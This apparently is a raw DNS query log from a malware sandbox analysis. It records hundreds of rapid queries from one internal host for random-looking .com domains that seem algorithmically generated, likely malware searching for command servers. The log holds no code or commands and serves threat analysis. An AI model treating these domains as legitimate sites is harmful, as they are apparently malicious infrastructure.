                                                                                                                                                                                                            Sep 8, 2024 09:00:27.793724060 CEST192.168.2.41.1.1.10xc3f6Standard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.794042110 CEST192.168.2.41.1.1.10xfbabStandard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.794265032 CEST192.168.2.41.1.1.10x6aa8Standard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.794878006 CEST192.168.2.41.1.1.10x955fStandard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.795221090 CEST192.168.2.41.1.1.10x652cStandard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.806379080 CEST192.168.2.41.1.1.10x4ffaStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.806521893 CEST192.168.2.41.1.1.10xccc9Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.807269096 CEST192.168.2.41.1.1.10xa9cdStandard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.807488918 CEST192.168.2.41.1.1.10x20cStandard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.807755947 CEST192.168.2.41.1.1.10xa237Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.807914019 CEST192.168.2.41.1.1.10x3b5aStandard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.808073997 CEST192.168.2.41.1.1.10x7f45Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.808291912 CEST192.168.2.41.1.1.10x185Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.808798075 CEST192.168.2.41.1.1.10x8e9bStandard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.809151888 CEST192.168.2.41.1.1.10xc1a5Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.809370041 CEST192.168.2.41.1.1.10xd1f4Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.809557915 CEST192.168.2.41.1.1.10x5d45Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.809855938 CEST192.168.2.41.1.1.10x7f56Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810096025 CEST192.168.2.41.1.1.10xad17Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810333967 CEST192.168.2.41.1.1.10x71adStandard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810497999 CEST192.168.2.41.1.1.10x19cStandard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810656071 CEST192.168.2.41.1.1.10x883Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810806036 CEST192.168.2.41.1.1.10x1be7Standard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.810960054 CEST192.168.2.41.1.1.10xc589Standard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.811110973 CEST192.168.2.41.1.1.10x19bStandard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.811273098 CEST192.168.2.41.1.1.10x9897Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.811422110 CEST192.168.2.41.1.1.10x962bStandard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.811575890 CEST192.168.2.41.1.1.10x7387Standard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.812463999 CEST192.168.2.41.1.1.10x2551Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.813710928 CEST192.168.2.41.1.1.10xf762Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.814631939 CEST192.168.2.41.1.1.10xe7d2Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.816884995 CEST192.168.2.41.1.1.10xa261Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.934801102 CEST192.168.2.41.1.1.10xbf6eStandard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.944825888 CEST192.168.2.41.1.1.10xaed4Standard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.951607943 CEST192.168.2.41.1.1.10x9d75Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.954399109 CEST192.168.2.41.1.1.10x4080Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.958579063 CEST192.168.2.41.1.1.10x9624Standard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.967050076 CEST192.168.2.41.1.1.10x5d84Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.967570066 CEST192.168.2.41.1.1.10x7b1eStandard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.011878014 CEST192.168.2.41.1.1.10x4876Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.011976004 CEST192.168.2.41.1.1.10x483cStandard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.012384892 CEST192.168.2.41.1.1.10x2246Standard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.012908936 CEST192.168.2.41.1.1.10xccbStandard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.013171911 CEST192.168.2.41.1.1.10x4cfStandard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.013335943 CEST192.168.2.41.1.1.10xb635Standard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.013714075 CEST192.168.2.41.1.1.10x99c5Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.013901949 CEST192.168.2.41.1.1.10x48ebStandard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.014231920 CEST192.168.2.41.1.1.10x85f3Standard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.014261961 CEST192.168.2.41.1.1.10x2a11Standard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.014791965 CEST192.168.2.41.1.1.10x20b9Standard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.014849901 CEST192.168.2.41.1.1.10xa125Standard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.015237093 CEST192.168.2.41.1.1.10xcb08Standard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.015561104 CEST192.168.2.41.1.1.10x8af6Standard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.015604019 CEST192.168.2.41.1.1.10x6635Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.016031981 CEST192.168.2.41.1.1.10x1924Standard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.016138077 CEST192.168.2.41.1.1.10xb1a9Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.016485929 CEST192.168.2.41.1.1.10x7c27Standard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.016628027 CEST192.168.2.41.1.1.10x9063Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.017007113 CEST192.168.2.41.1.1.10x1628Standard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.017124891 CEST192.168.2.41.1.1.10x45c8Standard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.017409086 CEST192.168.2.41.1.1.10x1e24Standard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.018050909 CEST192.168.2.41.1.1.10xf4baStandard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.025969028 CEST192.168.2.41.1.1.10x2d6cStandard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.026254892 CEST192.168.2.41.1.1.10xc5a3Standard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.026511908 CEST192.168.2.41.1.1.10xf325Standard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.026988029 CEST192.168.2.41.1.1.10x70adStandard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.029397011 CEST192.168.2.41.1.1.10x18dcStandard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.029603958 CEST192.168.2.41.1.1.10x1666Standard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.029814005 CEST192.168.2.41.1.1.10x7daaStandard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.030227900 CEST192.168.2.41.1.1.10xf47fStandard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.030478954 CEST192.168.2.41.1.1.10xc2c0Standard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.030596018 CEST192.168.2.41.1.1.10x6a5dStandard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.049237013 CEST192.168.2.41.1.1.10xa5a2Standard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.051295996 CEST192.168.2.41.1.1.10x7137Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.054205894 CEST192.168.2.41.1.1.10x70d7Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.054773092 CEST192.168.2.41.1.1.10xcf95Standard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.058564901 CEST192.168.2.41.1.1.10x4388Standard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.059580088 CEST192.168.2.41.1.1.10x2bc4Standard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.059842110 CEST192.168.2.41.1.1.10x707Standard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060029030 CEST192.168.2.41.1.1.10xc345Standard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060473919 CEST192.168.2.41.1.1.10xddc4Standard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060683966 CEST192.168.2.41.1.1.10x6e3dStandard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060883045 CEST192.168.2.41.1.1.10xa394Standard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.061512947 CEST192.168.2.41.1.1.10x620bStandard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.061876059 CEST192.168.2.41.1.1.10x105dStandard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.061975002 CEST192.168.2.41.1.1.10xd84bStandard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.062109947 CEST192.168.2.41.1.1.10x7daStandard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.062223911 CEST192.168.2.41.1.1.10x9545Standard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.063462973 CEST192.168.2.41.1.1.10xc163Standard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.063647032 CEST192.168.2.41.1.1.10xba8cStandard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.063831091 CEST192.168.2.41.1.1.10x19c9Standard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.067257881 CEST192.168.2.41.1.1.10x958Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.075195074 CEST192.168.2.41.1.1.10x36d6Standard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.080102921 CEST192.168.2.41.1.1.10x270fStandard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.080102921 CEST192.168.2.41.1.1.10xc8ecStandard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.080390930 CEST192.168.2.41.1.1.10xd313Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.649528980 CEST192.168.2.41.1.1.10xcfd4Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.657603979 CEST192.168.2.41.1.1.10x39a8Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.657672882 CEST192.168.2.41.1.1.10x177fStandard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.658379078 CEST192.168.2.41.1.1.10x8e00Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.658463001 CEST192.168.2.41.1.1.10x1a8aStandard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.658953905 CEST192.168.2.41.1.1.10x9502Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.659473896 CEST192.168.2.41.1.1.10x140eStandard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.659483910 CEST192.168.2.41.1.1.10x6549Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.660043001 CEST192.168.2.41.1.1.10x260aStandard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.662333965 CEST192.168.2.41.1.1.10xa7bdStandard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.663938999 CEST192.168.2.41.1.1.10x50c6Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.664427996 CEST192.168.2.41.1.1.10x45ccStandard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.665617943 CEST192.168.2.41.1.1.10xbd92Standard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.666142941 CEST192.168.2.41.1.1.10xbb53Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.670207024 CEST192.168.2.41.1.1.10xab28Standard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.670707941 CEST192.168.2.41.1.1.10xdb96Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.671252966 CEST192.168.2.41.1.1.10x97acStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.679363966 CEST192.168.2.41.1.1.10xf34bStandard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.682884932 CEST192.168.2.41.1.1.10xd5b4Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687446117 CEST192.168.2.41.1.1.10x2a1Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687484980 CEST192.168.2.41.1.1.10x77c1Standard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687681913 CEST192.168.2.41.1.1.10x1a2dStandard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.752739906 CEST192.168.2.41.1.1.10xc209Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.753673077 CEST192.168.2.41.1.1.10xf16dStandard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.754049063 CEST192.168.2.41.1.1.10xad4Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.754383087 CEST192.168.2.41.1.1.10x8610Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.754899979 CEST192.168.2.41.1.1.10xbda3Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.755299091 CEST192.168.2.41.1.1.10x448dStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.757661104 CEST192.168.2.41.1.1.10xc8d1Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.758240938 CEST192.168.2.41.1.1.10x4ce3Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.758469105 CEST192.168.2.41.1.1.10xea50Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.758831024 CEST192.168.2.41.1.1.10x62f5Standard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.807265997 CEST192.168.2.41.1.1.10x4d5fStandard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.809520006 CEST192.168.2.41.1.1.10xbc80Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.844377995 CEST192.168.2.41.1.1.10x876cStandard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.844692945 CEST192.168.2.41.1.1.10xfeaeStandard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.845185995 CEST192.168.2.41.1.1.10x6bb1Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.845737934 CEST192.168.2.41.1.1.10x273cStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.846316099 CEST192.168.2.41.1.1.10x54e1Standard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.889175892 CEST192.168.2.41.1.1.10x8e5cStandard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.889395952 CEST192.168.2.41.1.1.10x8b07Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890141010 CEST192.168.2.41.1.1.10x8cfdStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890355110 CEST192.168.2.41.1.1.10x2709Standard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890544891 CEST192.168.2.41.1.1.10xd2dcStandard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890707970 CEST192.168.2.41.1.1.10xaa28Standard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890830994 CEST192.168.2.41.1.1.10x7831Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.891057014 CEST192.168.2.41.1.1.10x7a77Standard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.891599894 CEST192.168.2.41.1.1.10x6378Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892011881 CEST192.168.2.41.1.1.10x1a69Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892046928 CEST192.168.2.41.1.1.10xaaf1Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892308950 CEST192.168.2.41.1.1.10x1a46Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892323971 CEST192.168.2.41.1.1.10xb9e4Standard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892570019 CEST192.168.2.41.1.1.10x8060Standard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892580986 CEST192.168.2.41.1.1.10x5036Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892821074 CEST192.168.2.41.1.1.10x1022Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892843962 CEST192.168.2.41.1.1.10xf053Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.893069029 CEST192.168.2.41.1.1.10xcb44Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.894666910 CEST192.168.2.41.1.1.10x8e7eStandard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.898313046 CEST192.168.2.41.1.1.10xc250Standard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.899979115 CEST192.168.2.41.1.1.10xc20bStandard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.900017977 CEST192.168.2.41.1.1.10x134Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.904356003 CEST192.168.2.41.1.1.10x2039Standard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.913439035 CEST192.168.2.41.1.1.10xe84bStandard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.922271967 CEST192.168.2.41.1.1.10xa522Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.397439957 CEST192.168.2.41.1.1.10x1ae9Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.408876896 CEST192.168.2.41.1.1.10x60e5Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.409567118 CEST192.168.2.41.1.1.10x8c11Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.409778118 CEST192.168.2.41.1.1.10x5dc9Standard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.410096884 CEST192.168.2.41.1.1.10xefceStandard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.411237001 CEST192.168.2.41.1.1.10x5b09Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.412486076 CEST192.168.2.41.1.1.10xad02Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.412837029 CEST192.168.2.41.1.1.10xf6eaStandard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413136959 CEST192.168.2.41.1.1.10x1f9cStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413275003 CEST192.168.2.41.1.1.10xe268Standard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413590908 CEST192.168.2.41.1.1.10x9f8eStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413721085 CEST192.168.2.41.1.1.10xfdf4Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414110899 CEST192.168.2.41.1.1.10x515bStandard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414172888 CEST192.168.2.41.1.1.10x81d6Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414628983 CEST192.168.2.41.1.1.10x687eStandard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414679050 CEST192.168.2.41.1.1.10x83e6Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.415478945 CEST192.168.2.41.1.1.10x9d5Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.415599108 CEST192.168.2.41.1.1.10xe3e7Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.416081905 CEST192.168.2.41.1.1.10x9a69Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.416321039 CEST192.168.2.41.1.1.10x88cfStandard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.416976929 CEST192.168.2.41.1.1.10x5c47Standard query (0)pujymel.comA (IP address)IN (0x0001)false
